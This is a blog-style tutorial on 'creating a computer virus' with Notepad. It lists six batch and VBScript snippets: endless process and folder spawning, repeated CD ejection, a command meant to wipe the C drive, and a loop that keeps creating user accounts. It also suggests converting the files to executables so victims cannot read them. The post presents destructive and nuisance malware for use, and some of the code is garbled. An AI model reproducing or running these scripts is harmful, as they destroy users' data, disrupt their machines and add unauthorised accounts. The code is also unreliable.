How to Create a Computer Virus ?
How to Create a Computer Virus !!
![]() |
Photo by Markus Spiske temporausch.com from Pexels |
Creating a virus using Notepad
Every computer nerd(user) always want to become a hacker or want to create a computer virus, So today i will show you how to create a computer virus using notepad.
Before we start i want to tell some important things:
1. You Should know Batch Scripting if you don't know then don't worry i will tell you right here in this article.
2. Some of the viruses we create today are so dangerous that they can make computer ran in serious problem and at computer may need to install a new windows so be careful.
3. To ran any of the virus below you have to copy and paste it in Notepad and save the File As " virus name.bat"
4. The Major Drawback of these virus is that anyone can read the files using Notepad so for that use Software to Batch to Exe converter.
What is Batch Scripting??
A batch file is a kind of script file in DOS, OS/2 and Microsoft Windows. It consists of a series of commands to be executed by the command-line interpreter, stored in a plain text file.We use Notepad to store these commands.
Lets Start Coding
1. Infinite Notepads
This code will start showing infinite number of Notepads.
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
2. Disturbing CD Drive
This Virus will start popping out CD Drive continuously.
Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop
3. Automatically Applications Opener
This virus will start opening different Apps in Pc, you can also add some programs your own.
@echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x
4. Infinite Folders
This Virus will start Showing Infinite Folder.
@echo off :x md %random% /folder. goto x
5. Ultimate Virus
This Virus will delete C drive which means the user have to install a new Windows and also he/she lose The all data in Computer.
@Echo off Del C:\ *.* |y
6. Add a new user
This Will Add infinite number of User Accounts, You can also assign a specific User
just replacing %random% to a name.
@echo off :xnet user %random% /add goto x
Hope You Enjoy it.
No comments: